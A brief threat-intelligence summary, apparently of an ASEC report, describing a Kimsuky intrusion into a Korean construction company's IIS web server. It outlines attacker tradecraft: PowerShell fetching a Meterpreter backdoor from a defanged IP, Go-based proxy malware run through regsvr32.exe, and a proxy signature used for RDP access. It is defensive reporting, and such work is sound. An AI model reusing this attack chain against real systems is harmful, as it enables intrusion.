ASEC describes Kimsuky attacks against a Windows IIS web server at a Korean construction company, shifting from the group’s usual document-based spear phishing to exploitation of poorly managed or unpatched web servers. After breaching the IIS process, the actor executed PowerShell to download a Metasploit Meterpreter backdoor from 45.58.52[.]82 and then used Meterpreter to install additional proxy malware. The Meterpreter stager and proxy tool were written in Go, and the DLL payload ran through regsvr32.exe, a method ASEC says matches prior Kimsuky tradecraft. The proxy component relayed IP and port pairs and used an “aPpLe” communication signature, likely to support later RDP access to the compromised server.